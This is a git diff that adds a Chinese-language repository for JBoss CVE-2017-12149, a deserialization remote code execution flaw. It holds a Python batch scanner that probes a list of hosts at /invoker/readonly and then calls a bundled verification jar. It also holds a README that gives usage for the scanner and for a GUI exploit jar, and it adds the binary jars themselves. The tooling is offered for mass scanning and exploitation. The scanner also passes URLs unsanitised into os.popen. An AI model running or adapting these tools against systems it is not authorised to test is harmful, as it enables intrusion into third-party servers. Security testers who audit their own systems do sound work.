diff --git a/Jboss-cve201712149-pl.py b/Jboss-cve201712149-pl.py new file mode 100644 index 0000000..7136d9b --- /dev/null +++ b/Jboss-cve201712149-pl.py @@ -0,0 +1,41 @@ +#!/usr/bin/python +#coding:utf-8 +#author:Ja0k +#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149 +import os,sys,requests +import urllib3 +urllib3.disable_warnings() + +#access http://*.*.*.*/invoker/readonly return 500 +def url_Test(url): + POC_url="/invoker/readonly" + headers={"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Connection": "close", + "Upgrade-Insecure-Requests": "1", + "Content-Type": "application/x-www-form-urlencoded"} + try: + code=requests.get(url+POC_url,headers=headers,timeout=5,verify=False).status_code + if code == int(500): + print "%s/invoker/readonly maybe use HttpInvoker! \n" %url + return True + except requests.exceptions.ConnectionError, e: + pass + +#POC RCE +def Poc_Test(url): + output=os.popen("java -jar verify_CVE-2017-12149.jar %s" %url) + if "vuln"in output.read(): + print "%s is Vul-Jboss-cve-2017-12149! \n" %url + + +if __name__ == "__main__": + if len(sys.argv) < 2: + print "Usage: %s urllist.txt \nurl-format:http://1.1.1.1:8080" %sys.argv[0] + exit() + for i in open(sys.argv[1],'r').readlines(): + url=i.strip() + if url_Test(url): + Poc_Test(url) \ No newline at end of file diff --git a/README.md b/README.md index 1f7e6ef..a41d7cf 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,31 @@ -# vuln -python/vul/poc/exp/ +# +1.jboss反序列化_CVE-2017-12149.jar GUI +jboss-_CVE-2017-12149 + +#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149 + +2.漏洞验证 +verify_CVE-2017-12149.jar提供命令行模式下验证漏洞,如果漏洞存在返回特征字符串,只需要执行命令: + +```shell/cmd +$ java -jar verify_CVE-2017-12149.jar http://xxx:8080 + +#成功返回: +vuln6581362514513155613jboss +``` +#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149 + +3.批量验证漏洞(支持http/https协议) +```shell/cmd +$ python Jboss-cve201712149-pl.py urllist.txt +``` +urllist.txt-format: +http://1.1.1.1:8080 +``` +#成功返回: +``` +http://192.168.1.10:8080/invoker/readonly maybe use HttpInvoker! +http://192.168.1.10:8080 is Vul-Jboss-cve-2017-12149! +``` +ps:py运行需要安装requests 库 +pip install requests diff --git a/jboss_CVE-2017-12149/1 b/jboss_CVE-2017-12149/1 new file mode 100644 index 0000000..d00491f --- /dev/null +++ b/jboss_CVE-2017-12149/1 @@ -0,0 +1 @@ +1 diff --git "a/jboss\345\217\215\345\272\217\345\210\227\345\214\226_CVE-2017-12149.jar" "b/jboss\345\217\215\345\272\217\345\210\227\345\214\226_CVE-2017-12149.jar" new file mode 100644 index 0000000..f09a6c9 Binary files /dev/null and "b/jboss\345\217\215\345\272\217\345\210\227\345\214\226_CVE-2017-12149.jar" differ diff --git a/urllist.txt b/urllist.txt new file mode 100644 index 0000000..fbdc1c3 --- /dev/null +++ b/urllist.txt @@ -0,0 +1 @@ +http://192.168.1.10:8080 \ No newline at end of file diff --git a/verify_CVE-2017-12149.jar b/verify_CVE-2017-12149.jar new file mode 100644 index 0000000..3bc29d7 Binary files /dev/null and b/verify_CVE-2017-12149.jar differ diff --git "a/\346\210\252\345\233\276.jpg" "b/\346\210\252\345\233\276.jpg" new file mode 100644 index 0000000..4def81c Binary files /dev/null and "b/\346\210\252\345\233\276.jpg" differ diff --git "a/\346\210\252\345\233\2762.png" "b/\346\210\252\345\233\2762.png" new file mode 100644 index 0000000..72e22a0 Binary files /dev/null and "b/\346\210\252\345\233\2762.png" differ diff --git "a/\346\210\252\345\233\2763.png" "b/\346\210\252\345\233\2763.png" new file mode 100644 index 0000000..ba79676 Binary files /dev/null and "b/\346\210\252\345\233\2763.png" differ